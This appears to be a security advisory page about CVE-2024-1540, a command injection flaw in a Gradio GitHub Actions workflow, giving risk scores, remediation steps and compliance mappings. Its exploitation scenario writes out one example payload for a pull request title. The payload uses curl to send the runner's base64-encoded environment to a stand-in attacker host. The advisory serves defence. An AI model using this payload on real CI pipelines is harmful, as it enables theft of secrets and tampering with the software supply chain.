AI Threat Alert AI Threat Alert

CVE-2024-1540: Gradio: CI/CD command injection enables secrets exfil

HIGH PoC AVAILABLE CISA: TRACK*
Published March 27, 2024
CISO Take

If your ML team uses Gradio or has forked its CI/CD workflows, your GitHub Actions secrets—cloud credentials, API keys, tokens—may be exposed to any external contributor who can open a pull request. Patch immediately by reviewing all workflow files for direct `${{ }}` interpolation in `run` steps and moving untrusted inputs to intermediate environment variables. Rotate any secrets stored in affected CI environments as a precaution.

Risk Assessment

High risk (CVSS 8.2) with low attack complexity and no authentication required—any external contributor can trigger this via a crafted PR. Gradio is one of the most widely deployed ML demo and prototype frameworks in the AI ecosystem, meaning the blast radius extends across research labs, startups, and enterprise ML teams. The primary concern is not the Gradio framework code itself but the CI/CD pipeline pattern, which many teams have copied or adapted. Secrets exfiltration is a silent, high-value outcome that may go undetected for weeks.

Affected Systems

Package Ecosystem Vulnerable Range Patched
gradio pip No patch
42.5K OpenSSF 5.6 674 dependents Pushed 8d ago 27% patched ~110d to patch Full package profile →

Do you use gradio? You're affected.

Severity & Risk

CVSS 3.1
8.2 / 10
EPSS
0.5%
chance of exploitation in 30 days
Higher than 67% of all CVEs
Source: EPSS v3 — FIRST.org
Exploitation Status
Exploit Available
Exploitation: MEDIUM
Sophistication
Trivial
Exploitation Confidence
medium
CISA SSVC: Public PoC
Public PoC indexed (trickest/cve)
Composite signal derived from CISA KEV, CISA SSVC, EPSS, trickest/cve, and Nuclei templates.

Attack Surface

AV AC PR UI S C I A
AV Network
AC Low
PR None
UI None
S Unchanged
C High
I Low
A None

Recommended Action

6 steps

  1. Apply the patch from commit d56bb28 immediately if running self-hosted or forked Gradio workflows.

  2. Audit ALL GitHub Actions workflow files for run steps containing ${{ github.event.* }} or any untrusted context expression—this pattern is the root cause.

  3. Refactor by assigning untrusted inputs to environment variables first (e.g., ENV_VAR: ${{ github.event.pull_request.title }}) before referencing them in shell commands.

  4. Rotate all GitHub Actions secrets (GITHUB_TOKEN scopes, cloud credentials, API keys) as a precaution.

  5. Enable GitHub's 'Require approval for all outside collaborators' workflow setting to gate execution on untrusted PRs.

  6. Use CodeQL or Semgrep with the GitHub Actions ruleset to detect similar injection patterns across all repos.

CISA SSVC Assessment

Decision Track*
Exploitation poc
Automatable Yes
Technical Impact partial

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

Classification

Code Execution Supply Chain Framework AML.T0010.001 AML.T0025 AML.T0050 AML.T0055

Compliance Impact

This CVE is relevant to:

EU AI Act
Article 15 - Accuracy, Robustness and Cybersecurity
ISO 42001
A.10.2 - AI Supplier Relationships A.5.5 - AI System Security
NIST AI RMF
GOVERN 1.4 - Organizational Teams and Responsibilities MANAGE 2.4 - Mechanisms for Incident Response
OWASP LLM Top 10
LLM05:2025 - Insecure Plugin Design

Frequently Asked Questions

What is CVE-2024-1540?

If your ML team uses Gradio or has forked its CI/CD workflows, your GitHub Actions secrets—cloud credentials, API keys, tokens—may be exposed to any external contributor who can open a pull request. Patch immediately by reviewing all workflow files for direct `${{ }}` interpolation in `run` steps and moving untrusted inputs to intermediate environment variables. Rotate any secrets stored in affected CI environments as a precaution.

Is CVE-2024-1540 actively exploited?

Proof-of-concept exploit code is publicly available for CVE-2024-1540, increasing the risk of exploitation.

How to fix CVE-2024-1540?

1. Apply the patch from commit d56bb28 immediately if running self-hosted or forked Gradio workflows. 2. Audit ALL GitHub Actions workflow files for `run` steps containing `${{ github.event.* }}` or any untrusted context expression—this pattern is the root cause. 3. Refactor by assigning untrusted inputs to environment variables first (e.g., `ENV_VAR: ${{ github.event.pull_request.title }}`) before referencing them in shell commands. 4. Rotate all GitHub Actions secrets (GITHUB_TOKEN scopes, cloud credentials, API keys) as a precaution. 5. Enable GitHub's 'Require approval for all outside collaborators' workflow setting to gate execution on untrusted PRs. 6. Use CodeQL or Semgrep with the GitHub Actions ruleset to detect similar injection patterns across all repos.

What systems are affected by CVE-2024-1540?

This vulnerability affects the following AI/ML architecture patterns: ML deployment pipelines, CI/CD workflows, Model training pipelines, Model serving infrastructure.

What is the CVSS score for CVE-2024-1540?

CVE-2024-1540 has a CVSS v3.1 base score of 8.2 (HIGH). The EPSS exploitation probability is 0.53%.

Technical Details

NVD Description

A command injection vulnerability exists in the deploy+test-visual.yml workflow of the gradio-app/gradio repository, due to improper neutralization of special elements used in a command. This vulnerability allows attackers to execute unauthorized commands, potentially leading to unauthorized modification of the base repository or secrets exfiltration. The issue arises from the unsafe handling of GitHub context information within a `run` operation, where expressions inside `${{ }}` are evaluated and substituted before script execution. Remediation involves setting untrusted input values to intermediate environment variables to prevent direct influence on script generation.

Exploitation Scenario

An adversary forks the Gradio repository or submits a pull request with a crafted PR title or branch name containing shell metacharacters—e.g., `'; curl https://attacker.com/exfil?t=$(cat /proc/self/environ | base64) #`. When the `deploy+test-visual.yml` workflow runs, it interpolates the GitHub context expression directly into a shell `run` step. The injected command executes in the CI runner, exfiltrating the `GITHUB_TOKEN`, any stored cloud provider credentials, and API keys. The attacker can use the `GITHUB_TOKEN` to push malicious commits, tamper with releases, or inject backdoored model artifacts into the deployment pipeline—all without ever having write access to the repository.

Weaknesses (CWE)

CWE-77

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N

References

Timeline

Published
March 27, 2024
Last Modified
July 30, 2025
First Seen
March 27, 2024

Related Vulnerabilities

CRITICAL CVE-2024-47167 9.8

Gradio: unauthenticated SSRF in /queue/join, internal pivot

Same package: gradio
CRITICAL CVE-2024-39236 9.8

Gradio: code injection via component metadata (CVSS 9.8)

Same package: gradio
CRITICAL CVE-2023-25823 9.8

Gradio: hardcoded SSH key leaks via share=True demos

Same package: gradio
CRITICAL CVE-2024-0964 9.4

Gradio: unauthenticated LFI exposes full server filesystem

Same package: gradio
CRITICAL CVE-2023-34239 9.1

Gradio: path traversal + SSRF exposes model files & infra

Same package: gradio
Back to Threat Feed